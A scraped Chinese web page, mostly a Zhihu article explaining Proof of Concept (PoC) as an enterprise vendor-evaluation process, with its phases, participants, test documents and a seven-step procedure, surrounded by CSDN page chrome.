2022年50篇

2021年76篇

2020年254篇

2019年115篇

目录

评论

被折叠的  条评论

为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

祝福语

请填写红包祝福语或标题

红包数量

红包个数最小为10个

红包总金额

红包金额最低5元

余额支付

当前余额3.43元

前往充值 >

需支付:10.00元

取消

确定

下一步

知道了

成就一亿技术人!

领取后你会自动成为博主和红包主的粉丝

规则

hope_wisdom 发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额

0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值

PoC相关概念 - 知乎

PoC相关概念 - 知乎切换模式写文章登录/注册PoC相关概念hell02006security waterPoC(Proof of Concept),即概念验证。通常是企业进行产品选型时或开展外部实施项目前,进行的一种产品或供应商能力验证工作。 验证内容1、产品的功能。产品功能由企业提供,企业可以根据自己的需求提供功能清单,也可以通过与多家供应商交流后,列出自己所需要的功能;2、产品的性能。性能指标也是由企业提供,并建议提供具体性能指标所应用的环境及硬件设备等测试环境要求;3、产品的API适用性;4、产品相关技术文档的规范性、完整性;5、涉及到自定义功能研发的,还需验证API开放性,供应商实施能力;6、企业资质规模及企业实施案例等。验证内容归根结底,就是证明企业选择的产品或供应商能够满足需求,并且提供的信息准确可靠 PoC测试工作准备前提1、前期调研充分,并已经对产品或供应商有了较深入的沟通了解;2、企业对自己的产品需求比较清晰。PoC测试工作参与者使用用户代表、业务负责人、项目负责人、技术架构师、测试工程师、商务经理等 PoC测试工作准备文档1、PoC测试工作说明文档。内容包括测试内容、测试要求(如私有化部署)、测试标准、时间安排等;1、功能测试用例。主要确认功能可靠性,准确性。内容包括功能名称、功能描述等;2、场景测试用例。主要测试企业团队实施响应速度、实施能力、集成能力。这部分通常按照企业需求而定,不建议太复杂,毕竟需要供应商实施干活儿的嘛,拖得太长企业耐性受到影响,时间也会拉长。3、技术测评方案。主要验证产品的性能、功能覆盖情况 、集成效率、技术文档的质量。4、商务测评方案。主要包括企业实力、企业技术人才能力、版权验证、市场背景、产品报价等。PoC测试工作第一阶段 工作启动由商务或者对外代表对供应商发布正式邀请并附PoC测试工作说明。建立PoC协同群。以满足快速沟通,应答。涉及到私有化部署的,需要收集供应商部署环境要求,并与供应商一起进行部署工作,同时企业参与人员对部署工作情况做好记录。 第二阶段 产品宣讲及现场集中测试供应商根据企业提供的PoC测试工作说明及相应测试模块的用例或方案进行产品现场测试论证。企业参与人员参与功能测试,并填写记录和意见。此阶段供应商往往需进行现场操作指导:。 第三阶段 技术测评供应商根据企业提供的技术要求给出相关支持文档,企业进行现场比对,根据实际情况进行统计记录。并保留供应商提供的资料和对比记录。涉及到场景demo设计的,建议企业对实施人员能力、实施时长、实施准确性进行比对。 第四阶段 间歇性测试工作该阶段是在第一阶段启动时,就可以开始了。测试功能外,还包括关键用户使用的体验心得、易用性评价。该部分允许企业用户主观评价,建议可以扩大范围组织间歇性测试,并做好测试用户记录。间歇时间1天或者多天根据实际情况安排。 第五阶段 商务验证供应商根据企业提供的商务测评方案,积极配合工作。涉及到客户核实的,还需要企业进行考证。该部分工作也是从第一阶段启动时,就可以开始了。 第六阶段 背书归档、分析总结每个阶段的工作都需要记录好参与人、时间、工作说明,并将测试过程中企业的、供应商的文档分类归档。对每个阶段进行分析对比,总结评价。进行整体工作分析总结。 PoC工作按照不同企业,和程度,测试的方式和投入力度不一样。但是目的都是相同的——验证产品或供应商能力真实满足企业需求。 转至https://www.zhihu.com/question/61118100?sort=createdPOC(proof-of-concept)Proof of ConceptPOC是根据特定客户的特定业务需求而设计的软件、硬件原型的解决方案。POC 的目的是为客户确定合适的系统组成、系统或软件产品版本、方案的服务需求,或者看看建议的方案是否可行。POC 不仅能确定应该做什么,也确定不应该做什么。有时POC的最大价值在于在正式大规模实施方案以前,提前发现应该这个方案可能是无法工作的。POC可以由Sun iForce Ready Center,经过授权的iForce Ready Centers或者合作伙伴来负责实施。POC的一般操作步骤第一步:了解客户的业务环境1. 通过必要的接触,了解客户的业务环境2. 考查相关的信息技术3. 确定客户的业务模型和技术要点第二步:确定项目的实施范围1. 选择合适的关键技术和应用软件2. 确定并保留测试所需的硬件环境3. 确定项目的主要组成部分第三步:测试小组的建立1. 由各方专家组成测试小组2. 介绍并演示相关的技术和产品3. 组织必要的培训第四步:测试环境的建立1. 制定详细的测试计划2. 安装所需的硬件和系统软件3. 安装并配置网络第五步:开发应用系统的验证模型1. 安装并配置所需的应用软件2. 软件开发和软件客户化3. 必要的反复和修正第六步:测试1. 验证系统的主要功能2. 可靠性、扩展性、兼容性方面的测试3. 配置并演示附加功能第七步:项目总结1. 记录和评估测试结果2. 形成测试报告3. 保存测试中生成的软件和文档原文链接:POC(proof-of-concept)_DBAdream的专栏-CSDN博客还有一个漏洞poc发布于 2021-02-28 11:08POC (Proof Of Concept)​赞同 25​​1 条评论​分享​喜欢​收藏​申请